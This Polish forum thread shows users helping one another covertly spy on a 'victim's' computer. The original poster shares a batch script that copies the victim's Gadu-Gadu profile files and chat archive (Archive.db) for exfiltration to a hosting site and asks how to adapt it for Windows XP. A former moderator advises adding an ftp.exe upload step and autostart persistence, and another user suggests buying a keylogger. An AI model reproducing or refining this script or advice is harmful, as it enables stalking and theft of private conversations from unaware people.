Program do przeglądania komputera

bergol

Użytkownik
Dołączył
Luty 13, 2011
Posty
8
Witam!
Poszukuję programu albo tutoriala jak zrobić jakiś program/trojan lub co kolwiek co pozwalało by na przeglądanie komputera drugiej osoby przez internet, ofiara ma zmienne ip (internet z iPlusa - radiowy) ale mam dostęp do tego komputera bez problemu, lub jak znacie jakiś program który mógł bym zainstalować ofiarze i wysyłał by on dany plik na jakiś hosting np. cba.pl

Moim celem jest przeglądanie archiwum gg na bieżąco ale nie wiem jak, potrzebuje programu za pomocą którego będę mógł przeglądać partycje drugiej osoby tak aby ona nawet tego nie wiedziała lub tak jak mówiłem jakiegoś programu który będzie mi sam to archiwum wysyłał na cba.pl ;)
 

Silx

Użytkownik
Dołączył
Wrzesień 21, 2005
Posty
2
1255523665_by_sqz_500.jpg


Gdzies widzialem takie zapytanie.... Czytaj nie idz na latwizne.
 

bergol

Użytkownik
Dołączył
Luty 13, 2011
Posty
8
Tak tak, tylko ja nie potrafię takiego tematu znaleźć, chodzi mi o nowe GG a nie o te stare wersje 7.0 czy jakie to tam bylo
 

bergol

Użytkownik
Dołączył
Luty 13, 2011
Posty
8
Dobra mam taki skrypt:

@echo off
md C:\prof
copy start.bat C:\prof\start.bat
copy vista.txt C:\prof\vista.txt
c:
cd C:\
md prof

cd c:\
cd %userprofile%
cd AppData\Roaming\Nowe Gadu-Gadu\numerGG\

copy Profile.xml C:\prof\Profile.xml
copy ProfileBasic.xml C:\prof\ProfileBasic.xml
copy Status.xml C:\prof\Status.xml
copy Archive.db C:\prof\Archive.db
cd c:\
cd prof
start.bat

On jest pod Viste ale jest poradnik jak przerobić go na XP dodaje poradnik PDF w załączniku do tego skryptu.
Dokładnie chodzi mi o tą linijkę "cd %userprofile%" i autor pisze:

Linijka 8-10: Otwierają folder GG 8.0 w systemie Vista. „numerGG” należy zastąpić numerem ofiary
np. 7393305. Edytując linijkę 10 możesz przerobić skrypt pod system poeracyjny XP.

Czyli jak to mam przerobić żeby działał??
W ten sposób?:

cd %userprofile%
cd D:\Documents and Settings\Administrator\Dane aplikacji\Gadu-Gadu 10\1234567
Dobrze myślę??
 

^^KuLkA^^

Użytkownik
Dołączył
Październik 26, 2012
Posty
6
To polecam ''kupić Keyloggera'' od Meviu, jeżeli masz pełny dostępy do tego komputera, to na pewno ci się spodoba, tzn uzyskasz efekt taki jaki chcesz, czyli rozmowy, zrzuty ekranu itd. Tylko on kosztuję, ale tutaj ciężko coś za free dostać xD
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
nie rob jaj, to nie jest to xD
kod takiego programu mialby znacznie więcej linijek
Brakuje z 1 albo 2 linijek dosłownie, z wywołaniem systemowego programu ftp.exe.


Tak, przerobić pod XP - zmienić ścieżkę do archiwum bo w XP jest inna niż w Vista i Windows 7. Ostatecznie można dodać ręcznie jak masz dostęp cały taki skrypt wykradający archiwum do autostartu:

-> jak włamać się na gg
 
Ostatnia edycja:
Do góry Bottom